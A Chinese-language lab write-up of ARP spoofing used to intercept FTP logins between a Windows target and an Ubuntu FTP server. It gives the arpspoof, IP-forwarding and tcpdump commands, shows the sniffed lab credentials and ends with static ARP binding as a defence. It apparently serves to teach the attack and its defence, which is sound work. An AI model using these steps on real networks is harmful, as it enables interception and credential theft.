0x01 实验准备
实验拓扑图:
实验工具:
- arpspoof
命令:arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
- tcpdump
- wireshark
实验环境:
-
准备三台设备,分别是靶机(Windows)、攻击机(kali)和FTP服务器(Ubuntu),并处于互能ping通状态。
-
Ubuntu安装 FTP:apt install vsftpd,并配置ftp文件(vi /etc/vsftpd.conf)
-
在/etc/allowed_users文件下添加允许连接FTP的用户
0x02 实验步骤
1. 攻击机开启转发功能
#echo 1 > /proc/sys/net/ipv4/ip_forward
2. 攻击机使用 arpspoof工具实现双向欺骗
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
#arpspoof -i eth0 -t 192.168.233.128 192.168.233.168
#arpspoof -i eth0 -t 192.168.233.168 192.168.233.128
3. 攻击机使用tcpdump工具监听ftp端口(21端口)或者使用Wireshark监听ftp流量
#tcpdump -i eth0 -X tcp port 21
tcpdump工具监听21端口:
Wireshark工具监听并筛选ftp:
4. 分别查看靶机和FTP服务器的Mac地址
#arp -a
靶机上的Mac地址:
FTP服务器上的Mac地址:
5. 使用Windows(靶机)连接FTP服务器进行
>ftp 192.168.233.168
6. 查看攻击机抓取的数据包,发现靶机使用的FTP账号及密码
tcpdump抓到的数据包:
Wireshark抓到的数据包:
0x03 结果
FTP服务器
用户名:ftpuser
密码:ftpuser
0x04 防御
设置ip-mac双向绑定(将mac地址设置为静态)
- Windows绑定IP:arp -s IP Mac地址(arp -s 157.55.85.212 00-aa-00-62-c6-09)
- Linux绑定IP:arp -s IP Mac地址(arp -s 157.55.85.212 00:aa:00:62:c6:09)